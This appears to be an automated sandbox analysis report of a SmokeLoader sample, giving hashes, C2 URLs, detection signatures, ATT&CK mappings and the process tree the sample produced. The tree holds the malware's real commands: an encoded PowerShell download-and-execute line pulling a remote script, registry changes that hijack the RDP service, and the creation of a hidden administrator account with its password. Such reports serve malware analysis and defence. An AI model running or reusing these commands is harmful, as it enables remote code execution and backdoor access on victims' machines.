Analysis

  • max time kernel
    151s
  • max time network
    140s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    28-10-2021 15:54

General

  • Target

    e5bda93ec7d8724ce496359c5e3efabe.exe

  • Size

    185KB

  • MD5

    e5bda93ec7d8724ce496359c5e3efabe

  • SHA1

    ad9e1db817d0c69760155939c2fd633031f10418

  • SHA256

    0610000cdfda33355202ed75a2f542cf035207e5d26d5e4b11063a17cdcdc8be

  • SHA512

    53a1e16ab40c0173248b9adf8bb4ecf04fef532301581c63b3876803c8234185fedf4dd588d768e29b610dd5ecc62f933dd79427f086c89741768e5c8cfe9948

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

C2

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/

rc4.i32
rc4.i32

Signatures

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • suricata: ET MALWARE ServHelper CnC Inital Checkin

    suricata: ET MALWARE ServHelper CnC Inital Checkin

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e5bda93ec7d8724ce496359c5e3efabe.exe
    "C:\Users\Admin\AppData\Local\Temp\e5bda93ec7d8724ce496359c5e3efabe.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:3316
  • C:\Users\Admin\AppData\Local\Temp\3767.exe
    C:\Users\Admin\AppData\Local\Temp\3767.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:600
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2swqih2a\2swqih2a.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1748
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5010.tmp" "c:\Users\Admin\AppData\Local\Temp\2swqih2a\CSCBD3710FE722445B4ABAE1C68D47DEE80.TMP"
          4⤵
            PID:940
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1508
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1680
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:596
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:3592
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:3116
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:3456
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3188
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:2160
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3812
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2692
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2748
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2256
                • C:\Windows\system32\cmd.exe
                  cmd /c net start TermService
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2208
                  • C:\Windows\system32\net.exe
                    net start TermService
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2480
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start TermService
                      6⤵
                        PID:2448
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                  3⤵
                    PID:2644
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                    3⤵
                      PID:3688
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 start rdpdr
                  1⤵
                    PID:3244
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user WgaUtilAcc 000000 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:928
                    • C:\Windows\system32\net.exe
                      net.exe user WgaUtilAcc 000000 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3936
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                        3⤵
                          PID:1660
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user WgaUtilAcc uc7YWrTP /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:892
                      • C:\Windows\system32\net.exe
                        net.exe user WgaUtilAcc uc7YWrTP /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:836
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user WgaUtilAcc uc7YWrTP /add
                          3⤵
                            PID:1336
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4036
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:824
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                            3⤵
                              PID:1968
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2652
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1724
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                              3⤵
                                PID:1964
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2116
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1848
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                3⤵
                                  PID:3248
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user WgaUtilAcc uc7YWrTP
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2384
                              • C:\Windows\system32\net.exe
                                net.exe user WgaUtilAcc uc7YWrTP
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1628
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user WgaUtilAcc uc7YWrTP
                                  3⤵
                                    PID:2012
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic path win32_VideoController get name
                                1⤵
                                  PID:3776
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic path win32_VideoController get name
                                    2⤵
                                    • Modifies data under HKEY_USERS
                                    PID:3564
                                • C:\Windows\System32\cmd.exe
                                  cmd.exe /C wmic CPU get NAME
                                  1⤵
                                    PID:3616
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic CPU get NAME
                                      2⤵
                                        PID:3452
                                    • C:\Windows\System32\cmd.exe
                                      cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                      1⤵
                                        PID:2328
                                        • C:\Windows\system32\cmd.exe
                                          cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                          2⤵
                                            PID:3640
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                              3⤵
                                              • Blocklisted process makes network request
                                              • Drops file in Program Files directory
                                              • Drops file in Windows directory
                                              • Modifies data under HKEY_USERS
                                              PID:1088

                                        Network

                                        MITRE ATT&CK Matrix ATT&CK v6

                                        Persistence

                                        Account Manipulation

                                        1
                                        T1098

                                        Registry Run Keys / Startup Folder

                                        1
                                        T1060

                                        Defense Evasion

                                        Modify Registry

                                        2
                                        T1112

                                        Discovery

                                        Query Registry

                                        1
                                        T1012

                                        Peripheral Device Discovery

                                        1
                                        T1120

                                        System Information Discovery

                                        1
                                        T1082

                                        Lateral Movement

                                        Remote Desktop Protocol

                                        1
                                        T1076

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Temp\2swqih2a\2swqih2a.dll
                                          MD5

                                          565a30f7f4af35b549c830654303069e

                                          SHA1

                                          0214896ff8866856cbe9cac258842697df1a80de

                                          SHA256

                                          223623460f848323cf676c73556863b8a1a30c59cbd9306047b8ce090d332d04

                                          SHA512

                                          1bd5f0827e3adcac5f18ad9316a36b92640cb6e82be4337b76ccfc869928f16d00d0b4f35931c7986c001372db0839ebe310228d8e52ac602f44165e91db50ba

                                        • C:\Users\Admin\AppData\Local\Temp\3767.exe
                                          MD5

                                          63151e4f7c3972f18a23c0e9996e14ef

                                          SHA1

                                          5d041fde6433a8ff8fc78a69fca1fd4630e3f270

                                          SHA256

                                          cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3

                                          SHA512

                                          f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec

                                        • C:\Users\Admin\AppData\Local\Temp\3767.exe
                                          MD5

                                          63151e4f7c3972f18a23c0e9996e14ef

                                          SHA1

                                          5d041fde6433a8ff8fc78a69fca1fd4630e3f270

                                          SHA256

                                          cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3

                                          SHA512

                                          f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec

                                        • C:\Users\Admin\AppData\Local\Temp\RES5010.tmp
                                          MD5

                                          b8ea36d7637385e0a1d68dc93e0a0aea

                                          SHA1

                                          6e1ca83a19b3d4ee98f7a95cb5b754b10b9700d1

                                          SHA256

                                          4ca46f1d855e269f75cc15bc421a6e2d3854317b20cdb29b710e1d635e140e94

                                          SHA512

                                          337d4a6b54ff331afdba6f8fef78ff77b50dc098e172e8461421741254067bc386421280209e1c14a2c91790dee06f0a7f8d7f01ea986fd211ae429cbd7e020e

                                        • C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
                                          MD5

                                          f783019c5dc4a5477d1ffd4f9f512979

                                          SHA1

                                          37c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b

                                          SHA256

                                          4c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348

                                          SHA512

                                          64d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a

                                        • C:\Users\Admin\AppData\Local\Temp\ready.ps1
                                          MD5

                                          28d9755addec05c0b24cca50dfe3a92b

                                          SHA1

                                          7d3156f11c7a7fb60d29809caf93101de2681aa3

                                          SHA256

                                          abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

                                          SHA512

                                          891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

                                        • \??\c:\Users\Admin\AppData\Local\Temp\2swqih2a\2swqih2a.0.cs
                                          MD5

                                          9f8ab7eb0ab21443a2fe06dab341510e

                                          SHA1

                                          2b88b3116a79e48bab7114e18c9b9674e8a52165

                                          SHA256

                                          e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

                                          SHA512

                                          53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

                                        • \??\c:\Users\Admin\AppData\Local\Temp\2swqih2a\2swqih2a.cmdline
                                          MD5

                                          47a31f85f924e91feab0fbfa94f21fde

                                          SHA1

                                          b66c67b4821e6afb22669c2ef571368e2a6896a6

                                          SHA256

                                          60f2957f4490a07e6ad7176cc051eb30639b34cea01d7e1830c0a637cc68cb57

                                          SHA512

                                          1478827b888651c4c005008f558cb4d716344fb1ab6442f71c0fa5f0ae5617b46ffd0294747200fd4e22519dc7546c2c24314c0dfbad6a799383d995c1c6b9f7

                                        • \??\c:\Users\Admin\AppData\Local\Temp\2swqih2a\CSCBD3710FE722445B4ABAE1C68D47DEE80.TMP
                                          MD5

                                          c6ca9ee8551fafbe02d4c0ff1ac8101c

                                          SHA1

                                          2105df499383daa43239a63fbcac4b6b32aa1f7e

                                          SHA256

                                          fd915b325b877cdc5481cd37c223bb4f1aab60dcb5eb77119af8dd2a1722f2fa

                                          SHA512

                                          fda53d9d1b11a6b1ffd43c7291ca1fe329942d0e8ba3c6732cf08e4ea0775f4e5c63d40cf5060507da5f2a18ad561c6258deb7531cf58c906f18a3ac937df3f5

                                        • \Windows\Branding\mediasrv.png
                                          MD5

                                          ac13d804585a74dc542db4ec94da39df

                                          SHA1

                                          8642ae2e04e492700caf41b43de9ef9d8b3c26f9

                                          SHA256

                                          84c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55

                                          SHA512

                                          0ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf

                                        • \Windows\Branding\mediasvc.png
                                          MD5

                                          9151c95451abb048a44f98d0afac8264

                                          SHA1

                                          22f447b210eb25c11be5a9c31f254f5f2bd50a78

                                          SHA256

                                          8082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518

                                          SHA512

                                          728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13

                                        • memory/596-302-0x000001C7E2178000-0x000001C7E217A000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/596-301-0x000001C7E2176000-0x000001C7E2178000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/596-267-0x000001C7E2173000-0x000001C7E2175000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/596-266-0x000001C7E2170000-0x000001C7E2172000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/596-252-0x0000000000000000-mapping.dmp
                                        • memory/600-138-0x00000153F5A00000-0x00000153F5A01000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/600-158-0x00000153F5DE0000-0x00000153F5DE1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/600-134-0x00000153F36A0000-0x00000153F36A2000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/600-135-0x00000153F36A0000-0x00000153F36A2000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/600-136-0x00000153F5110000-0x00000153F5112000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/600-137-0x00000153F5113000-0x00000153F5115000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/600-205-0x00000153F36A0000-0x00000153F36A2000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/600-132-0x00000153F36A0000-0x00000153F36A2000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/600-140-0x00000153F36A0000-0x00000153F36A2000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/600-144-0x00000153F5116000-0x00000153F5118000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/600-131-0x00000153F36A0000-0x00000153F36A2000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/600-130-0x00000153F36A0000-0x00000153F36A2000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/600-129-0x00000153F36A0000-0x00000153F36A2000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/600-206-0x00000153F36A0000-0x00000153F36A2000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/600-128-0x0000000000000000-mapping.dmp
                                        • memory/600-166-0x00000153F5118000-0x00000153F5119000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/600-159-0x00000153F6170000-0x00000153F6171000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/600-152-0x00000153F5140000-0x00000153F5141000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/600-133-0x00000153F50D0000-0x00000153F50D1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/824-370-0x0000000000000000-mapping.dmp
                                        • memory/836-368-0x0000000000000000-mapping.dmp
                                        • memory/940-148-0x0000000000000000-mapping.dmp
                                        • memory/1088-381-0x0000000000000000-mapping.dmp
                                        • memory/1088-387-0x000001FDF2C00000-0x000001FDF2C02000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1088-388-0x000001FDF2C03000-0x000001FDF2C05000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1088-396-0x000001FDF2C06000-0x000001FDF2C08000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1088-422-0x000001FDF2C08000-0x000001FDF2C09000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/1336-369-0x0000000000000000-mapping.dmp
                                        • memory/1508-201-0x00000197D2F86000-0x00000197D2F88000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1508-168-0x00000197B8E90000-0x00000197B8E92000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1508-177-0x00000197D2F83000-0x00000197D2F85000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1508-178-0x00000197B8E90000-0x00000197B8E92000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1508-180-0x00000197B8E90000-0x00000197B8E92000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1508-181-0x00000197B8E90000-0x00000197B8E92000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1508-176-0x00000197D2F80000-0x00000197D2F82000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1508-202-0x00000197B8E90000-0x00000197B8E92000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1508-203-0x00000197B8E90000-0x00000197B8E92000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1508-174-0x00000197B8E90000-0x00000197B8E92000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1508-173-0x00000197B8E90000-0x00000197B8E92000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1508-167-0x0000000000000000-mapping.dmp
                                        • memory/1508-221-0x00000197D2F88000-0x00000197D2F8A000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1508-169-0x00000197B8E90000-0x00000197B8E92000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1508-170-0x00000197B8E90000-0x00000197B8E92000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1508-171-0x00000197B8E90000-0x00000197B8E92000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1628-376-0x0000000000000000-mapping.dmp
                                        • memory/1660-367-0x0000000000000000-mapping.dmp
                                        • memory/1680-264-0x000001D76ECB6000-0x000001D76ECB8000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1680-223-0x000001D76ECB3000-0x000001D76ECB5000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1680-265-0x000001D76ECB8000-0x000001D76ECBA000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1680-222-0x000001D76ECB0000-0x000001D76ECB2000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1680-211-0x0000000000000000-mapping.dmp
                                        • memory/1724-372-0x0000000000000000-mapping.dmp
                                        • memory/1748-145-0x0000000000000000-mapping.dmp
                                        • memory/1848-374-0x0000000000000000-mapping.dmp
                                        • memory/1964-373-0x0000000000000000-mapping.dmp
                                        • memory/1968-371-0x0000000000000000-mapping.dmp
                                        • memory/2012-377-0x0000000000000000-mapping.dmp
                                        • memory/2160-353-0x0000000000000000-mapping.dmp
                                        • memory/2208-361-0x0000000000000000-mapping.dmp
                                        • memory/2256-360-0x0000000000000000-mapping.dmp
                                        • memory/2448-363-0x0000000000000000-mapping.dmp
                                        • memory/2480-362-0x0000000000000000-mapping.dmp
                                        • memory/2644-449-0x0000000000000000-mapping.dmp
                                        • memory/2692-357-0x0000000000000000-mapping.dmp
                                        • memory/2748-358-0x0000000000000000-mapping.dmp
                                        • memory/3032-118-0x0000000000450000-0x0000000000466000-memory.dmp
                                          Filesize

                                          88KB

                                        • memory/3116-314-0x0000000000000000-mapping.dmp
                                        • memory/3188-352-0x0000000000000000-mapping.dmp
                                        • memory/3244-359-0x0000000000000000-mapping.dmp
                                        • memory/3248-375-0x0000000000000000-mapping.dmp
                                        • memory/3316-117-0x0000000000400000-0x0000000002EF4000-memory.dmp
                                          Filesize

                                          43.0MB

                                        • memory/3316-115-0x0000000002FE0000-0x0000000002FE8000-memory.dmp
                                          Filesize

                                          32KB

                                        • memory/3316-116-0x0000000002FF0000-0x0000000002FF9000-memory.dmp
                                          Filesize

                                          36KB

                                        • memory/3452-379-0x0000000000000000-mapping.dmp
                                        • memory/3456-315-0x0000000000000000-mapping.dmp
                                        • memory/3564-378-0x0000000000000000-mapping.dmp
                                        • memory/3592-313-0x0000000000000000-mapping.dmp
                                        • memory/3640-380-0x0000000000000000-mapping.dmp
                                        • memory/3688-450-0x0000000000000000-mapping.dmp
                                        • memory/3812-356-0x0000000000000000-mapping.dmp
                                        • memory/3936-366-0x0000000000000000-mapping.dmp
                                        • memory/3988-125-0x0000015C2CC13000-0x0000015C2CC15000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/3988-122-0x0000015C45840000-0x0000015C45C3F000-memory.dmp
                                          Filesize

                                          4.0MB

                                        • memory/3988-119-0x0000000000000000-mapping.dmp
                                        • memory/3988-126-0x0000015C2CC15000-0x0000015C2CC16000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/3988-124-0x0000015C2CC10000-0x0000015C2CC12000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/3988-127-0x0000015C2CC16000-0x0000015C2CC17000-memory.dmp
                                          Filesize

                                          4KB